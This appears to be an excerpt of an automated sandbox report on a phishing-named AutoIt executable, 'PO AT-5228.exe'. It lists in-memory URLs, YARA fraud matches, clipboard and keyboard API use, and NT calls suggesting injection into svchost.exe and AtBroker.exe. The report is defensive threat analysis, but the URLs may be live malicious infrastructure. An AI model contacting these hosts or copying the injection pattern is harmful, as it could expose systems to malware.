                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121130140569.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121401562198.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://reg.ru
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: AtBroker.exe, 00000003.00000002.3526286582.0000000005DB6000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.00000000044E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPo
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lan
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_h
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&amp;reg_source=parking_auto
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BB6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BB6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BB6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BA2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BCF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

                Source: Yara match | File source: 1.2.svchost.exe.440000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.440000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00B63D19
                Source: PO AT-5228.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: PO AT-5228.exe, 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_b01fa7d8-4
                Source: PO AT-5228.exe, 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3f373521-2
                Source: PO AT-5228.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_e1caf27d-9
                Source: PO AT-5228.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c37cb31f-0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0046C9E3 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E735C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E74340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E74650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72C70 NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E72D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E73090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E73010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E73D70 NtOpenThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E73D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F4650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F4340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F35C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F39B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F2B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F3010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F3090 NtSetValueKey
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F3D70 NtOpenThread
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_045F3D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_00509350 NtCreateFile
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_005094C0 NtReadFile
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_005095B0 NtDeleteFile
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_00509650 NtClose
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 3_2_005097B0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BA6685: CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BA79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B8B043
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B73200
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B73B70
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9410F
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B802A4
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B6E3B0
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9038E
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B806D9
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9467F
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BCAACE
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B94BEF
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B8CCC1
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B66F07
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B6AF50
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BC31BC
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B8D1B9
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B7B11F
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B8123A
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9724D
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B693F0
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BA13CA
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B7F563
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B696C0
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BAB6CC
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B677B0
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BCF7FF
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B979C9
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B7FA57
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B69B60
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B67D19
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B89ED0
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B7FE6F
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B67FA3
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_01960CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00458983
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0046F073
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00442810
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004430F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004410A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00450243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00441210
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004422F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00456BD3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00442C64
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00450463
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00442C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004424C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004424D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0044E4E31_2_0044E4E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004424B81_2_004424B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC02C01_2_02EC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE02741_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F01_2_02E4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F003E61_2_02F003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA3521_2_02EFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED20001_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF81CC1_2_02EF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF41A21_2_02EF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F001AA1_2_02F001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC81581_2_02EC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E301001_2_02E30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA1181_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5C6E01_2_02E5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3C7C01_2_02E3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E407701_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E647501_2_02E64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEE4F61_2_02EEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF24461_2_02EF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE44201_2_02EE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F005911_2_02F00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E405351_2_02E40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA801_2_02E3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF6BD71_2_02EF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFAB401_2_02EFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E8F01_2_02E6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E268B81_2_02E268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4A8401_2_02E4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E428401_2_02E42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A01_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0A9A61_2_02F0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E569621_2_02E56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFEEDB1_2_02EFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52E901_2_02E52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFCE931_2_02EFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40E591_2_02E40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFEE261_2_02EFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E32FC81_2_02E32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBEFA01_2_02EBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB4F401_2_02EB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E82F281_2_02E82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60F301_2_02E60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE2F301_2_02EE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30CF21_2_02E30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0CB51_2_02EE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40C001_2_02E40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3ADE01_2_02E3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E58DBF1_2_02E58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4AD001_2_02E4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDCD1F1_2_02EDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE12ED1_2_02EE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5D2F01_2_02E5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5B2C01_2_02E5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E452A01_2_02E452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E8739A1_2_02E8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2D34C1_2_02E2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF132D1_2_02EF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF70E91_2_02EF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF0E01_2_02EFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEF0CC1_2_02EEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E470C01_2_02E470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4B1B01_2_02E4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7516C1_2_02E7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2F1721_2_02E2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0B16B1_2_02F0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF16CC1_2_02EF16CC
